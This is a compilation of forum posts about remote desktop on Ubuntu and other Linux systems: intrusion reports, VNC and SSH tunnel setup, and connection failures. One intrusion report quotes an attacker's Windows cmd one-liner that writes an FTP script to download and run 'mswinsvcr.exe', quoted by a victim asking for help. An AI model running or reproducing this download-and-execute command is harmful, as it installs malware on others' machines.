Ubuntu Security :: Random Outside IP Trying To Access Remote Desktop
Jun 5, 2011
I was sitting watching a TV show on the internet (streaming from channel 4) and all of a sudden I get a request from an unknown IP address, outside of my local network attempting to access my ubuntu desktop, I obviously declined straight away and stupidly didn't take note of the IP I've checked my firewall settings and no ports are being forwarded, everything is as it should be. I am running Ubuntu 11.04, and a little bit concerned. As of now I have completely disabled remote desktop on my laptop.
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing Code: %systemroot%system32cmd.exe del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this: Code: %systemroot%system32cmd.exe del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
Running Ubuntu 9.10. In the Remote Desktop config dialog I get: "Your desktop is only reachable over the local network. Others can access your computer using the address 127.0.0.1 or tabatha.local." I understand this means only the loopback ip address is available. All my other machines show their true local ip address (e.g., 192.168.1.104) in this dialog. Thus I cannot log on to this desktop from other machines.
When I try to do a remote logon from another Ubuntu 9.10 box (or from an XP box using a VNC viewer), I get: "Connection to 192.168.1.102 has been closed." What steps are needed to make this machine show its actual ip address? All file sharing between the various machines is working properly and all windows shares back and forth between XP and 'nix, and among the the vaious XP boxes and linux boxes are available as designed.
I always use VNC to check my server for updates, and this morning I started the xvnc4viewer to vnc into my server and it keep asking for a password. I never setup a password because I do this local from my laptop, and I am the only one who uses my laptop. I had to go to my server and check the setting in System > Preferences > Remote Desktop and found them all changed. There was a password setup and there was a check mark in the you must confirm each access to this machine there some security update that changed all these setting? Sometimes when I do updates I don't know what is being changed on my server
So I've read a bit and it seems that this is okay and secure. But I wanted to double check here with everyone, because I trust here more than just about anywhere. I've read about the hipporemote (which is pretty cool) and I have it working. Basically I want to make sure my system is still secure.
1. I had to open a port on my firewall for the VNC connection.
2. I turned on the Remote Desktop 2a. Checked Allow other users to view.... 2b. Checked Allow other users to control.... 2c. Checked You must confirm..... 2d. Checked for password, and put in a password 2e. Checked Configure network automatically to accept connectios
So with doing all of that, am I ok? I think so, especially since it says its only accessible on my local network. But I just wanted to hear from people who know more than I do that I don't need to worry any more than normal about others accessing my machine. I'm mainly thinking 2e, I don't fully understand what's going on there.
how i can remote access my pc at home from work ? on different pc that has access to INTERNET. what software shall I install on my pc at home ? I want to be able to install software on my pc at home from my work place, my home pc has unbuntu Linux ubuntu 2.6.31-17-generic #54-Ubuntu SMP Thu Dec 10 17:01:44 UTC 2009 x86_64 GNU/Linux
Today I noticed my Desktop was being controlled remotely from over the Internet even though I had it set for 'local network only'. Foolishly I relied on this setting and hadn't specified a password or other security. The remote user had opened my Firefox passwords page and was perusing this when I pulled the plug.
All external checks confirmed that my router/firewall is actively blocking correctly. How could this happen? How can I prevent this in the future? I had recently install the Firefox extension for Weave Sync and wonder if that had anything to do with it?
I just had a window pop up on my desktop saying my pc was being remotely controlled. Ubuntu 10.10The pc shutdown by itself, and I disconnected it from the net.I rebooted and uninstalled the remote desktop app.
I just set up Remmina the other day to be able to access my desktop remotely. However, I can only do this when I am connected to my home network. Is there a way to set up Remmina so that I can connect to my desktop remotely from outside my home network?
my g/f was able to access her jobs computers from home in Windows. she'd go start->program->access->connect to remote desktop... (or something like that) in any event, i've found some programs in Fedora 14 that say they'd do the same, however i can't get it to work. in "remote desktop viewer" i'm trying to use 'VNC' protocol,and trying to put the ip in the first of the "Host" lines.
now, there might be another issue, is it possible she need more info than the ones she got in order to use LINUX remote desktop? she has (what she has written down as) Computer # 220.127.116.11 and then ';' and 4 additional numbers, so (for the sake of the example) computer#: 18.104.22.168;2222 she has a 'username' and a 'password'.
I am attempting to set up a VNC with ssh tunneling for remote desktop between my laptop (opensuse 11.2) and my desktop (kubuntu karmic) and using the instructions here: [URL] and here: [URL] but I am having trouble getting remote desktop to work once I establish the ssh tunnel
I start out with Code: ssh <user@remotepc> -p <non22port> -L 5900:localhost:5900 That seems to wok and connect properly
The problem comes when I try to use a remote desktop client on the laptop to initiate the VPN desktop sharing and point it to Code: localhost:5900
Thats when I get a notification on the host saying: Code: Refused uninvited connection attempt from 127.0.0.1
And on the laptop I get: Code: VNC server closed connection
I have tried messing with the few settings in Krfb, but none seem to have any impact. How do I open localhost:5900 and allow VPN tunneling to the host machine?
I have been using Remote desktop on Windows 7 to view and control my Ubuntu machine in the office quite happily over the office network. No problems there. I wanted to access it from my home connection so I read that I could do this by opening a port on the ubuntu machine's firewall. So I installed a firewall. Didnt see any way to open a port easily so I uninstalled it and installed another one. Same issue so I uninstalled that and then left it. I then tried to Remote Desktop the Ubuntu machine from my Windows 7 laptop and ERROR I can no longer connect.
I was working on my desktop under Ubuntu 9.10 when I got a message in the the upper right telling me that my Remote Desktop Connection had been activated. I don't know who it was, but they proceeded to open up a terminal and start typing a bunch of stuff. This scared the living @#$^ out of me, so I didn't really pay attention to what he was doing and immediately dove for the reset button. I disconnected my network from the web and found that RDC was NOT password protected.
Now, I probably did this a little while ago while I was playing around with it, but I also set up an account with dyndns.org. Would this possibly increase the number of attacks on my network? Just in case, I have removed my listing. Also, would any of this incident be logged somewhere? How/Where would I look to see if I'm being poked and prodded for another security hole?
I setup a remote web server yesterday evening, which had Centos 5.3 on it. This went well, and I did this mostly over vnc, to get a GUI. However, I hadn't realised that there was a pending cron job to 'yum upgrade'. So, come 2am, 5.3 turned into 5.6. I carried on the install today, but after some time (I'm not sure exactly how or when), I lost the ability to run any GUI system config tools that required root login. I also lost the ability to run anything graphical - emacs, for example, when I was already root in an xterm.
/var/log/secure isn't telling me anything. It claims that it's running the config tool on my behalf, but nothing happens. If I try to run emacs, I get a message saying that the X server isn't responding. Could this be related to the upgrade? It feels like a PolicyKit problem - I've seen something similar on 6.0 for remote access over vnc - but 5.6 isn't running PolicyKIt.
I have 4 boxes on a local network: 2 with XP only, 1 with Ubuntu 9.10 only, and 1 with both. All boxes can share folders, set up with share-admin instead of using Nautilus right-click properties for each folder. I can see and control the remote desktops on all boxes, to all other boxes, from all other boxes,with one exception: I can only access the XP desktop on the dual boot box, not the Ubuntu desktop. When I try I get: "Connection to host 192.168.1.102 was closed." I am refused access to the Ubuntu desktop in this manner from both the other Ubuntu machine, and from both XP machines.
My setups are basically plain vanilla with routine installs of Ubuntu 9.10. On the XP machines I am using TightVNC on the XP machines to view both other XP desktops, and the Ubuntu desktop that is accessible. On both Ubuntu setups I am using (I suppose) vino and vinagre, and have completely re-installed what I think is the relevant software. There is no firewall running on the Ubuntu dual boot, when I check ufw. For reasons I cannot determine the inaccessible Ubuntu desktop is not providing its own address but instead in the Remote Desktop config dialogue it identifies itself as 22.214.171.124 which I think is the loopback id. I know so little about this sort of networking that I am not giving all relevant info, but I still thought I'd try.
I have just installed linux 10.10, I want to use vnc on my another computer to access my desktop using remote access. When I navigate to Remote esktop Preferences. Your desktop is only reachable over the local network. Others can access your computer using the address localhost, no ip address. this is not working.
I am having the following problems:I have tried installing vnctightserver on Ubuntu and then installing the viewer on my windows machine but when I try to connect it rejects the connection....I need to remotely access the ubuntu-desktopn my ubuntu server LTS 10.04..... I have tried a number of guides but none are working for me....I have a firewall installed (iptables) but the neccesary ports have been opened up but my server still rejects incoming vnc connections.On a side note I do not have physical access to the server so all setup needs to be done via SSH...
What I want to do is pull data from any of the hard drives attached to my Linux box from my Windows machine. I have been moving small amounts of data from the drives to my OS drive and those parts share easily, but I want to move away from that method to move large amounts of data at the same time.I have tried using Samba as it is used for file sharing between systems and that I have to give my Windows box permission through Samba.
Trick is, I'm not sure where to start, though I have an idea and wanted to know if this is the right track before I start editing my file system.
Weird thing going on on my headless lenny box. The shared desktop won't let me in.I am trying to connect with my Mac, ssh is ok. I can connect, start vino-preferences, change everything I want to change, and still it won't let me in. both Mac Ctrl-k to vnc://lenny and Chicken of the VNC won't connect.
New Fedora 13 Install. I have Remote Desktop Enabled. I can access the machine from itself but not others on the network. I stopped the firewall, that did not work. I looked in hosts.allow and hosts.deny, no entries there. The vino server is running. There is nothing in /varlog/messages, dmesg or /var/log/secure, at least nothing I could find related to vino. What else can I check? The conf file in my home folder looks exactly like one on another machine where it is working. forgot to add the message I get when I try it from a remote machine is "The connection to host 192.168.1.100 was closed". So it appears something is actively rejecting the login.
I use a hosted machine for work which has vnc and apache servers running. To work on a shell, I connect to the VNC server, and to access files I host them using apache and open them from my browser. It would be great if I can access my shells via my browser itself instead of using VNC or command prompt.
I am looking for an end result like this: [URL].. What are my options? PS: I already tried [URL]..but this uses a java applet to run and does not do it in browser itself.
They are running Kubuntu. How to access their desktop from my home or office using Internet. Logically I remembered about kfrb and X11-vnc. But both of them need some approach to provide security. I'd like if someone could give me some pieces of advice on choosing the simplest and better approach:
To secure kfrb or x11-vnc is simpler or better to mount a vpn or to use an ssh tunnel? Is there any other solution? My pearents ISP use DHCP, so I think it would require some service like dyndns or similar...
I've just been tasked with making our company's workstations available from remote locations over our internet connection. While it seems simple in concept, I know there will be several issues I'll have to deal with. What I'd like to know is if anyone has recommendations as far as software to use and methods for securing connections. I'd like to have communications encrypted, which last I heard OpenVNC couldn't do (maybe that's not the case?). Also, I'm not really sure how the interactions between windows clients vs. my linux server and the remote connections should be handled. Would I need a separate instance of say, OpenVNC, on each client that I wanted to be allowed remote access?
I have a home LAN server with Ubuntu Desktop edition 10.10 and I'm having a problem with remote desktop application. For now I have a monitor on that machine, but in the future it's gonna be only the box, without any periferal devices. When I try to log in via UltraVNC from Windows XP, on Ubuntu server a little window pops up, asking me to allow or refuse this "invader", so I click Allow and I really have full control on that machine. However, when I dont have any devices I wouldnt be able to click this Allow button, but will have to have full control. So, my question is how to autoclick this Allow button? Or when I try to log in the ubuntu machine, it would automatically give me full control?
I'm using a fingerprint reader on my laptop, works pretty well:
Code: $sudo echo hi Please swipe your finger: [swipe finger here of course]
Like I said, it works nicely... until I try to SSH in and sudo something remotely, when it will ask me kindly to swipe my finger over the reader that's attached to the laptop which is on my desk at home thirty kilometres away. Naturally there's no method built into pam_fprint to abort via a keypress.
So, is there any way to tell PAM to only use certain modules if I'm in a locally logged in session?